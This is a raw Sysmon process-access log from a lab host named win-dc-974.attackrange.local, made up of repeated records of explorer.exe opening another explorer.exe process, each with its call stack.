22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 